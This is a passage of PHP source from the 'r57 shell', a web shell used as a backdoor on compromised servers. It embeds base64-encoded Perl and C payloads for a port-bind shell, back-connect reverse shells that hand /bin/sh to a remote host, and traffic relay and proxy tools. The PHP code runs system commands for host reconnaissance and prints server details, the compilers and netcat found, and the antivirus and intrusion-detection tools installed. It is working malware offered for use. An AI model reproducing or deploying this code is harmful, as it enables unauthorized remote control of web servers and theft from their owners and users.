dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
                    $port_bind_bd_pl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
                    $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
                    $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
                    $datapipe_c = "I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
lsZSk7DQogIHJldHVybiAwOw0KfQ==";
                    $datapipe_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
                    $prx_pl = "IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
                    if ($unix) {
                        if (!isset($_COOKIE['uname'])) {
                            $uname = ex('uname -a');
                            setcookie('uname', $uname);
                        } else {
                            $uname = $_COOKIE['uname'];
                        }
                        if (!isset($_COOKIE['id'])) {
                            $id = ex('id');
                            setcookie('id', $id);
                        } else {
                            $id = $_COOKIE['id'];
                        }
                        if ($safe_mode) {
                            $sysctl = '-';
                        } else if (isset($_COOKIE['sysctl'])) {
                            $sysctl = $_COOKIE['sysctl'];
                        } else {
                            $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
                            if (empty($sysctl)) {
                                $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease');
                            }
                            if (empty($sysctl)) {
                                $sysctl = '-';
                            }
                            setcookie('sysctl', $sysctl);
                        }
                    }
                    echo $head;
                    echo '</head>';
                    echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333 width=160><font face=Verdana size=2>' . ws(2) . '<font face=tahoma size=2><b>#r57 shell ' . $version . '</b></font></td><td bgcolor=#333333><font face=Verdana size=-2>';
                    echo ws(2) . "<b>" . date("d-m-Y H:i:s") . "</b> Your IP: [<font color=blue>" . gethostbyname($_SERVER["REMOTE_ADDR"]) . "</font>]";
                    if (isset($_SERVER['X_FORWARDED_FOR'])) {
                        echo " X_FORWARDED_FOR: [<font color=red>" . $_SERVER['X_FORWARDED_FOR'] . "</font>]";
                    }
                    if (isset($_SERVER['CLIENT_IP'])) {
                        echo " CLIENT_IP: [<font color=red>" . $_SERVER['CLIENT_IP'] . "</font>]";
                    }
                    echo " Server IP: [<a href=http://www.ip-adress.com/reverse_ip/" . gethostbyname($_SERVER["HTTP_HOST"]) . " target=iframe><font color=blue>" . gethostbyname($_SERVER["HTTP_HOST"]) . "</font></a>]";
                    echo "<br>";
                    echo ws(2) . "PHP version: <b>" . @phpversion() . "</b>";
                    $curl_on = @function_exists('curl_version');
                    echo ws(2);
                    echo "cURL: <b>" . (($curl_on) ? ("<font color=green>ON</font>") : ("<font color=red>Kapali</font>"));
                    echo "</b>" . ws(2);
                    echo "MySQL: <b>";
                    $mysql_on = @function_exists('mysql_connect');
                    if ($mysql_on) {
                        echo "<font color=green>ON</font>";
                    } else {
                        echo "<font color=red>Kapali</font>";
                    }
                    echo "</b>" . ws(2);
                    echo "MSSQL: <b>";
                    $mssql_on = @function_exists('mssql_connect');
                    if ($mssql_on) {
                        echo "<font color=green>ON</font>";
                    } else {
                        echo "<font color=red>Kapali</font>";
                    }
                    echo "</b>" . ws(2);
                    echo "PostgreSQL: <b>";
                    $pg_on = @function_exists('pg_connect');
                    if ($pg_on) {
                        echo "<font color=green>ON</font>";
                    } else {
                        echo "<font color=red>Kapali</font>";
                    }
                    echo "</b>" . ws(2);
                    echo "Oracle: <b>";
                    $ora_on = @function_exists('ocilogon');
                    if ($ora_on) {
                        echo "<font color=green>ON</font>";
                    } else {
                        echo "<font color=red>Kapali</font>";
                    }
                    echo "</b><br>" . ws(2);
                    echo "Safe_mode: <b>";
                    echo (($safe_mode) ? ("<font color=green>ON</font>") : ("<font color=red>Kapali</font>"));
                    echo "</b>" . ws(2);
                    echo "Open_basedir: <b>";
                    if ($open_basedir) {
                        if ('' == ($df = @ini_get('open_basedir'))) {
                            echo "<font color=red>ini_get disable!</font></b>";
                        } else {
                            echo "<font color=green>$df</font></b>";
                        };
                    } else {
                        echo "<font color=red>NONE</font></b>";
                    }
                    echo ws(2) . "Safe_mode_exec_dir: <b>";
                    if (@function_exists('ini_get')) {
                        if ('' == ($df = @ini_get('safe_mode_exec_dir'))) {
                            echo "<font color=red>NONE</font></b>";
                        } else {
                            echo "<font color=green>$df</font></b>";
                        };
                    } else {
                        echo "<font color=red>ini_get disable!</font></b>";
                    }
                    echo ws(2) . "Safe_mode_include_dir: <b>";
                    if (@function_exists('ini_get')) {
                        if ('' == ($df = @ini_get('safe_mode_include_dir'))) {
                            echo "<font color=red>NONE</font></b>";
                        } else {
                            echo "<font color=green>$df</font></b>";
                        };
                    } else {
                        echo "<font color=red>ini_get disable!</font></b>";
                    }
                    echo "<br>" . ws(2);
                    echo "Disable functions : <b>";
                    $df = 'ini_get  disable!';
                    if ((@function_exists('ini_get')) && ('' == ($df = @ini_get('disable_functions')))) {
                        echo "<font color=red>NONE</font></b>";
                    } else {
                        echo "<font color=red>$df</font></b>";
                    }
                    $free = @diskfreespace($dir);
                    if (!$free) {
                        $free = 0;
                    }
                    $all = @disk_total_space($dir);
                    if (!$all) {
                        $all = 0;
                    }
                    echo "<br>" . ws(2) . "Free space : <b>" . view_size($free) . "</b> Total space: <b>" . view_size($all) . "</b>";
                    $ust = '';
                    if ($unix && !$safe_mode) {
                        if (which('gcc')) {
                            $ust.= "gcc,";
                        }
                        if (which('cc')) {
                            $ust.= "cc,";
                        }
                        if (which('ld')) {
                            $ust.= "ld,";
                        }
                        if (which('php')) {
                            $ust.= "php,";
                        }
                        if (which('perl')) {
                            $ust.= "perl,";
                        }
                        if (which('python')) {
                            $ust.= "python,";
                        }
                        if (which('ruby')) {
                            $ust.= "ruby,";
                        }
                        if (which('make')) {
                            $ust.= "make,";
                        }
                        if (which('tar')) {
                            $ust.= "tar,";
                        }
                        if (which('nc')) {
                            $ust.= "netcat,";
                        }
                        if (which('locate')) {
                            $ust.= "locate,";
                        }
                        if (which('suidperl')) {
                            $ust.= "suidperl,";
                        }
                    }
                    if (@function_exists('pcntl_exec')) {
                        $ust.= "pcntl_exec,";
                    }
                    if ($ust) {
                        echo "<br>" . ws(2) . $lang[$language . '_text137'] . ": <font color=blue>" . $ust . "</font>";
                    }
                    $ust = '';
                    if ($unix && !$safe_mode) {
                        if (which('kav')) {
                            $ust.= "kav,";
                        }
                        if (which('nod32')) {
                            $ust.= "nod32,";
                        }
                        if (which('bdcored')) {
                            $ust.= "bitdefender,";
                        }
                        if (which('uvscan')) {
                            $ust.= "mcafee,";
                        }
                        if (which('sav')) {
                            $ust.= "symantec,";
                        }
                        if (which('drwebd')) {
                            $ust = "drwebd,";
                        }
                        if (which('clamd')) {
                            $ust.= "clamd,";
                        }
                        if (which('rkhunter')) {
                            $ust.= "rkhunter,";
                        }
                        if (which('chkrootkit')) {
                            $ust.= "chkrootkit,";
                        }
                        if (which('iptables')) {
                            $ust.= "iptables,";
                        }
                        if (which('ipfw')) {
                            $ust.= "ipfw,";
                        }
                        if (which('tripwire')) {
                            $ust.= "tripwire,";
                        }
                        if (which('shieldcc')) {
                            $ust.= "stackshield,";
                        }
                        if (which('portsentry')) {
                            $ust.= "portsentry,";
                        }
                        if (which('snort')) {
